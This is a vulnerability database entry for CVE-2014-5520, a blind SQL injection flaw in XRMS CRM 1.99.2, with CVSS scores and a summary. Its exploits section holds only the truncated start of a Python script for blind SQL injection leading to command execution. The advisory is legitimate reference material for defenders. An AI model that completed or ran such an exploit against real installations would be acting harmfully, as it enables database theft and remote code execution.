7.5
CVSSv2

CVE-2014-5520

Published: 26/10/2014 Updated: 31/10/2014
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in XRMS CRM, possibly 1.99.2, allows remote malicious users to execute arbitrary SQL commands via the user_id parameter to plugins/webform/new-form.php, which is not properly handled by plugins/useradmin/fingeruser.php.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

xrms crm project xrms crm 1.99.2

Exploits

####################### # XRMS Blind SQLi via $_SESSION poisoning, then command exec ######################### import urllib import urllib2 import time import sys usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','','_','-','1','2','3','4','5','6','7','8','9','0'] userascii ...